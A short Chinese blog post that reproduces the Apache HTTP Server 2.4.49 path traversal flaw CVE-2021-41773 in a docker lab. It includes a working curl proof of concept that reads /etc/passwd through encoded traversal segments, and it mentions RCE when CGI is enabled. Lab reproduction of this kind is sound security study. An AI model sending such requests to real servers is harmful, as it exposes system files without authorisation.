Apache漏洞复现CVE-2021-41773

news2024/11/14 12:19:59

Apache HTTP Server 路径穿越漏洞

该漏洞是由于Apache HTTP Server 2.4.49版本存在目录穿越漏洞,在路径穿越目录 <Directory/>Require all granted</Directory>允许被访问的的情况下（默认开启），攻击者可利用该路径穿越漏洞读取到Web目录之外的其他文件

在服务端开启了gi或cgid这两个mod的情况下，这个路径穿越漏洞将可以执行任意cgi命令（RCE）

Apache HTTP Server 2.4.49
某些Apache HTTPd 2.4.50也存在此漏洞

docker pull blueteamsteve/cve-2021-41773:no-cgid
#启动容器
docker run -d -p 宿主机端口:容器端口 --name 容器名称 镜像的标识|镜像名称[:tag]

http://ip:8080

使用poc

curl http://ip:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/1986830.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！